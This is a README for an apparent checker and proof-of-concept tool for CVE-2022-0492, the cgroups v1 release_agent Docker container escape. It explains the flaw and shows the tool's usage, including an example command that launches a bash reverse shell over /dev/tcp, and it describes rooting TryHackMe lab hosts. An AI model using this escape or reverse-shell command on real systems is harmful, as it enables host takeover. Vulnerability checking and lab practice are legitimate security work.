# CVE-2022-0492 Docker Breakout Checker and PoC

## Summary

Exploiting the vulnerability requires the attacker to have access to a Docker container running on a vulnerable system. Once exploited, the attacker can escape the container and gain complete control over the host system.

A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.

More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates. If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file, an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent file is owned by root, so only a user with root access can modify it.

## Usage

# sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
        sh    --checker                Verify if system is vulnerable.
        sh -c|--command <COMMAND>      Execute command on host machine.
        sh -h|--help                   Print the help panel.

[>] Example:
        sh --command 'bash -c "bash -i >& /dev/tcp/ 0>&1"'


## Examples

### [Hamlet]( from TryHackMe
Root user in host machine pwned by disabling UFW and then sent a reverse shell.


### [Misguided Ghosts]( from TryHackMe
Root user in host machine pwned by setting SUID to bash, also sent reverse shell.


#### Sources: